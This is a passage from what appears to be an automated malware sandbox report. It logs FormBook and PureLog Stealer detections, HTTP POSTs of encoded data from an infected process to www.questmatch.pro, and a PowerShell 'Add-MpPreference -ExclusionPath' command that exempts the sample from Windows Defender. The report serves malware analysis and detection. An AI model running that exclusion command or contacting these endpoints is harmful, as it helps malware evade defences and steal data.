                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Nov 27, 2024 01:28:42.917366982 CET1202INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 27 Nov 2024 00:28:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 1000
                                                                                  Connection: close
                                                                                  Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                  Cache-Control: no-cache
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                                                  Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("14920d49321f67414c762f9a1fb56bb1");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/cvhb/?lH_L4=eb9ahS5GFYDOhq0JOiIrfnQwKg301mZRXDTXF/EDnGWOAiF9jJHx+uvzEaHIq78+HHS43fAza3sJA+7AAuSex8cscvdTrTgngauHU4xbCBdC3sDNHF9YUQ2vDY1OdPiGaw==&005PE=aNcLxhD894SLKl&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.550026172.67.138.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:48.675177097 CET612OUTPOST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 206
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 4e 70 66 4d 57 71 5a 2f 6e 43 2f 45 63 74 68 49 57 33 54 48 69 43 43 41 48 30 69 6d 41 79 47 6d 43 54 69 66 54 2b 67 58 32 4e 6f 2f 52 72 64 79 33 71 41 33 76 37 78 70 64 4f 2b 73 2f 55 7a 70 4a 6d 7a 31 79 6c 4e 64 45 32 43 6d 7a 36 68 52 56 76 6f 79 34 55 4d 78 69 66 54 37 71 79 42 7a 71 36 69 35 63 50 33 4a 73 51 45 56 57 37 45 39 78 66 4b 77 77 53 62 39 6e 69 56 41 31 49 61 67 62 6c 73 78 61 77 48 51 73 45 6d 48 64 61 30 6e 41 31 74 72 45 78 50 6e 39 6e 6a 61 76 66 74 4b 51 76 37 79 49 6f 59 46 7a 6f 2b 35 74 78 37 36 45 51 58 4f 2b 4e 68 37 45 77 73 3d
                                                                                  Data Ascii: lH_L4=aT9t+g+JeI7WNpfMWqZ/nC/EcthIW3THiCCAH0imAyGmCTifT+gX2No/Rrdy3qA3v7xpdO+s/UzpJmz1ylNdE2Cmz6hRVvoy4UMxifT7qyBzq6i5cP3JsQEVW7E9xfKwwSb9niVA1IagblsxawHQsEmHda0nA1trExPn9njavftKQv7yIoYFzo+5tx76EQXO+Nh7Ews=
                                                                                  Nov 27, 2024 01:28:49.997076035 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:49 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: bcbcbda0-f5da-43e9-a8bd-8d497b1411f6
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=233%2Bt6DMN1FmEuJjOTvd6cKU%2FUOkdolJ%2Bo48xDMguVqh2GzNcodYV3qGLhrImheA8%2FpiTbgCufZYt72yuVcodPauHFuz2CV0PrbKK3TTP3kBC4PfO43nIfxpDxvefP0Tn3WZBmo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e001a2d857288-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2020&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=612&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cb 0a c2 30 14 05 7f 25 9c 75 8b 2d 8d af 7c 80 d0 8d 0a ba 13 17 37 b9 89 16 63 2e a4 2d f8 a0 ff 2e c5 f5 0c c3 7c 61 85 df 30 69 8c b1 80 cf 59 72 0f f3 85 13 f6 30 ba d2 05 12 3d 3d 0c f6 32 a8 9d 8c 89 51 80 fd 40 5d ec 61 2e d8 8b ba 53 e2 e8 b3 0a 33 55 41 b2 3a 1e 4e 67 b5 f8 34
                                                                                  Data Ascii: b4$0%u-|7c.-.|a0iYr0==2Q@]a.S3UA:Ng4
                                                                                  Nov 27, 2024 01:28:49.997091055 CET79INData Raw: f2 5a e0 3a cd be 1d 6f 6d 0a f2 4f e7 ec 23 0d 9d a4 96 61 60 9d 75 96 a9 2a c3 92 a9 d4 8d df 96 b4 b1 5c 6e 58 6f d7 b6 d6 75 1d 56 28 d0 0f e4 1e e7 4c ce ff 6f a7 e9 07 00 00 ff ff 03 00 5d 7e 7b 9d bc 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: Z:omO#a`u*\nXouV(Lo]~{0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.550027172.67.138.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:51.330374002 CET632OUTPOST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 226
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 69 6d 44 32 4f 66 55 37 55 58 37 74 6f 2f 65 37 64 33 35 4b 41 43 76 37 39 66 64 50 43 73 2f 53 66 70 4a 6e 44 31 7a 55 4e 65 48 47 44 41 6f 4b 68 54 52 76 6f 79 34 55 4d 78 69 62 44 52 71 79 4a 7a 71 4a 36 35 66 75 33 4b 79 41 45 57 66 62 45 39 36 2f 4b 4b 77 53 61 53 6e 6e 4d 72 31 4f 65 67 62 6e 30 78 5a 6c 7a 54 33 55 6d 46 5a 61 31 4e 42 46 74 75 4a 52 58 37 38 47 6d 4f 37 4d 42 76 56 5a 4b 59 53 4b 51 74 67 49 53 42 39 69 7a 4e 56 67 32 6e 6b 75 78 4c 61 6e 36 6f 2b 6c 76 50 30 59 4f 6d 66 4e 50 6f 78 31 68 67 63 50 35 41
                                                                                  Data Ascii: lH_L4=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBimD2OfU7UX7to/e7d35KACv79fdPCs/SfpJnD1zUNeHGDAoKhTRvoy4UMxibDRqyJzqJ65fu3KyAEWfbE96/KKwSaSnnMr1Oegbn0xZlzT3UmFZa1NBFtuJRX78GmO7MBvVZKYSKQtgISB9izNVg2nkuxLan6o+lvP0YOmfNPox1hgcP5A
                                                                                  Nov 27, 2024 01:28:52.738586903 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:52 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 93fdea4e-e620-4662-a322-5531178283a9
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zi16AOOhxXWZivW2e2LqdEaJbJ%2B11yvfEueRQn%2FZBdLfmrQ7RwAtMmikmVTbY13q%2FCC6pxSJosCrfnhtKbWO0UcNbXnn%2FyCvWZRz1mGhlgAy%2BpHYxHll1xjSU4RVmmII1MVR2mg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e002b4fcc42a7-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=19248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=632&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e cd 0a 82 40 14 46 5f 65 f8 d6 8a 35 63 56 f3 00 81 1b 0b 72 17 2d 6e ce b5 a4 69 2e 8c 0a fd e0 bb 87 b8 3e 87 c3 f9 e1 26 ee 03 1b 46 ef 13 70 8c 12 7b d8 1f 1a 71 0c 9b af f2 04 81 5e 0c 8b 4a 06 75 90 31 38 24 70 3c 50 e7 7b d8 0b 2a 51 0f 0a ce 73 54 ed 4c 55 2b 51 9d 8e e7
                                                                                  Data Ascii: b6$@F_e5cVr-ni.>&Fp{q^Ju18$p<P{*QsTLU+Q
                                                                                  Nov 27, 2024 01:28:52.738718987 CET84INData Raw: 5a 65 5f 23 ef 0c d7 69 f6 6f e3 bd 0c ad 2c e9 18 d9 d3 d0 49 28 1d 2c f6 a6 75 4c 39 a7 5c e8 55 9a 17 85 4e c9 68 9d 6e 36 66 bd de ee f4 ce d0 1e 09 fa 81 9a 67 1d a9 e1 e5 76 9a fe 00 00 00 ff ff 03 00 5d 8b 50 b4 bc 00 00 00 0d 0a 30 0d 0a
                                                                                  Data Ascii: Ze_#io,I(,uL9\UNhn6fgv]P0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.550028172.67.138.37803812C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:54.143984079 CET1649OUTPOST /z3ox/ HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Origin: http://www.questmatch.pro
                                                                                  Cache-Control: max-age=0
                                                                                  Content-Length: 1242
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Referer: http://www.questmatch.pro/z3ox/
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)
                                                                                  Data Raw: 6c 48 5f 4c 34 3d 61 54 39 74 2b 67 2b 4a 65 49 37 57 63 35 50 4d 56 4e 46 2f 75 43 2f 44 5a 74 68 49 45 33 54 4c 69 43 2b 41 48 32 50 6a 42 42 71 6d 44 45 47 66 53 63 49 58 36 74 6f 2f 59 4c 64 32 35 4b 41 6c 76 37 56 44 64 50 4f 61 2f 58 44 70 4b 42 66 31 30 68 74 65 51 32 44 41 33 36 68 53 56 76 70 6f 34 55 38 74 69 66 6e 52 71 79 4a 7a 71 4f 43 35 4c 76 33 4b 77 41 45 56 57 37 45 59 78 66 4c 45 77 53 43 6f 6e 6e 35 51 79 2b 2b 67 63 48 6b 78 66 54 76 54 37 55 6d 39 65 61 31 56 42 46 67 2b 4a 52 37 33 38 47 44 54 37 50 68 76 58 63 72 47 47 4a 63 50 68 49 71 74 31 7a 4c 7a 58 32 65 59 6a 74 4e 6c 51 6e 33 4e 6a 6b 4c 39 78 64 69 34 56 66 36 41 79 52 70 6c 57 4a 51 71 49 51 54 59 4d 66 4e 50 4d 2f 68 4b 49 35 4e 77 6b 39 6c 5a 54 33 54 37 6c 6c 48 4c 68 4b 34 79 62 38 70 75 71 47 79 30 59 79 73 56 6b 75 33 6e 47 75 5a 50 4a 33 4e 64 68 70 59 67 7a 61 6d 34 45 49 59 58 44 62 56 72 56 42 37 67 59 7a 4d 53 77 44 4f 4d 68 42 6a 42 64 48 4a 30 71 6a 74 44 63 6a 55 55 52 42 65 36 50 35 6e 35 50 67 46 47 [TRUNCATED]
                                                                                  Data Ascii: lH_L4=aT9t+g+JeI7Wc5PMVNF/uC/DZthIE3TLiC+AH2PjBBqmDEGfScIX6to/YLd25KAlv7VDdPOa/XDpKBf10hteQ2DA36hSVvpo4U8tifnRqyJzqOC5Lv3KwAEVW7EYxfLEwSConn5Qy++gcHkxfTvT7Um9ea1VBFg+JR738GDT7PhvXcrGGJcPhIqt1zLzX2eYjtNlQn3NjkL9xdi4Vf6AyRplWJQqIQTYMfNPM/hKI5Nwk9lZT3T7llHLhK4yb8puqGy0YysVku3nGuZPJ3NdhpYgzam4EIYXDbVrVB7gYzMSwDOMhBjBdHJ0qjtDcjUURBe6P5n5PgFG6LNw3jqQ04I/UMdVhG1CkALLDeNcnJcn3DFIlpXlRLyWXTswCawyEKT0kBFGgDluV6n7fzepxmctrI4W7FycS+yAK/L1aFzWwHzUAvOi5BPLMIJ5yXvwRU90FfEI1FiWFKeZrSV9h+dul5s2d8AfET8TKusVwZoXD7QjsuQIbYo2DCzrmbcHhxCzPwnns5kVW/E0tCQ/2wpCUzthkrfG/fMVToyYFZTWhoZbtrtuBOy3xsc4dxS7InYBmis9wohPUIfbtPVH3gAmdZsQ+aIoH2dX4wnb83c6zIrwj/VvQVMs8hCqlSf0/0Iu4txgRJrsFfsCxERy/AIW0kJKPbUJg1JgqrTmwlYQKi6CTA6AB5a5BfuJ7xp0bguOHcaPbbSH2pq2P9qdniTBUS5AcR+OCuvtdQ4990yZ9b9gOsW3ywQANmIndZyZb9EmSn1108O5oFJvlYLipCxW3Rj/gIsQG1G8iRw5HBmebDlG/uPcFPK8T+48ycTP1EtxEBTk3UOAgW17sgND0wztJ8hQ7to17+fpRU45sfpy+rPU7kEFzrhgkcNe4hmA9bTKf456k1Ptq1qcM6UtnQX96ZJhMNbjCp8EpZfTBcp+MH6Bsl8YIuny93UcZuinghfwH42BHH+ZVS1Od7yb5P6+BHSNX0aXbfiSzoUJzgodjW [TRUNCATED]
                                                                                  Nov 27, 2024 01:28:55.474082947 CET1236INHTTP/1.1 404
                                                                                  Date: Wed, 27 Nov 2024 00:28:55 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: c25717e3-50e4-47e0-8071-34b463c7683e
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.75
                                                                                  CF-IPCountry: US
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cSn3uad%2FBbJHBwaDLAP8Y78GModmqaOLmTK7WVfnSIqlTH24PQE%2F9ruBYtVC%2FvgZ4vqQbzVqfmZYgDImT3Tfw0TaTbPbKDrCd7H4n%2B8x03HRklYX%2BS3NAN%2BuD0sOwWxndcFFcho%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8e8e003c6e2041ad-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1542&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1649&delivery_rate=0&cwnd=180&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 24 8e 4d 0a c2 30 14 06 af 12 be 75 4b ab 89 4d c9 01 04 37 2a d8 9d b8 48 93 57 2d c6 3c 48 5b f0 87 de 5d 4a d7 33 0c f3 43 cb fe 03 13 a7 10 32 50 4a 9c 06 98 1f 1c 7b 82 51 a5 ca 10 ed 8b 60 70 e4 51 ec 79 8a 1e 19 3c 8d b6 0f 03 cc 15 47 16 0f 1b 7d a0 24 ba
                                                                                  Data Ascii: b0$M0uKM7*HW-<H[]J3C2PJ{Q`pQy<G}$
                                                                                  Nov 27, 2024 01:28:55.474214077 CET90INData Raw: 85 8a 8e 93 38 9f 2e 8d 28 be 92 df 05 6e f3 e2 b7 d3 fd 10 3b 5e d3 29 51 b0 63 cf f1 e0 61 e0 b6 3b bd d1 24 f3 5d 49 2a 57 9a ca bc 2e f5 26 97 aa 55 95 74 ba aa 25 21 c3 30 5a f7 6c 92 75 b4 de ce f3 1f 00 00 ff ff 0d 0a 61 0d 0a 03 00 a6 8d
                                                                                  Data Ascii: 8.(n;^)Qca;$]I*W.&Ut%!0Zlua#2
                                                                                  Nov 27, 2024 01:28:55.475208998 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  48192.168.2.550029172.67.138.3780
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 27, 2024 01:28:57.172549009 CET360OUTGET /z3ox/?lH_L4=XRVN9XS8GrL3N+/sXJw1nASfMdlrVHj65QayKB69AEGBKWegVMYG7P4Sa4h2i8A2rJx8M9mN63brSxfD4lNhVmfI//tpSvw7xSsa4vbhkQtFrYKlL+/JsA82eJgn+fnUtQ==&005PE=aNcLxhD894SLKl HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MATMJS)


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:19:24:48
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Users\user\Desktop\W3MzrFzSF0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\W3MzrFzSF0.exe"
                                                                                  Imagebase:0x920000
                                                                                  File size:795'136 bytes
                                                                                  MD5 hash:44AE4C9C2AB6623C0C1D04BB8B81871E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2068496606.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2070385799.0000000005670000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:19:24:49
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\W3MzrFzSF0.exe"
                                                                                  Imagebase:0xed0000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:19:24:49
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6d64d0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:5
                                                                                  Start time:19:24:52
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff6ef0c0000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:6
                                                                                  Start time:19:24:53
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                                                                                  Imagebase:0x10000
                                                                                  File size:2'625'616 bytes
                                                                                  MD5 hash:0A7608DB01CAE07792CEA95E792AA866
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172640781.00000000057E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2172148730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2173692414.00000000083A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:19:24:55
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe"
                                                                                  Imagebase:0x7e0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4467776927.0000000004AB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:19:24:57
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Windows\SysWOW64\pcaui.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\pcaui.exe"
                                                                                  Imagebase:0x20000
                                                                                  File size:135'680 bytes
                                                                                  MD5 hash:A8F63C86DEF45A7E48E7F7DF158CFAA9
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4467731020.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4467867908.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:10
                                                                                  Start time:19:25:13
                                                                                  Start date:26/11/2024
                                                                                  Path:C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\gFGqeaWqpCObVJdzrccxBgzYNETtKfLEBKNnEuNERPFyzzWJpUVvFafGUP\pDqSqZXvqQcT.exe"
                                                                                  Imagebase:0x7e0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
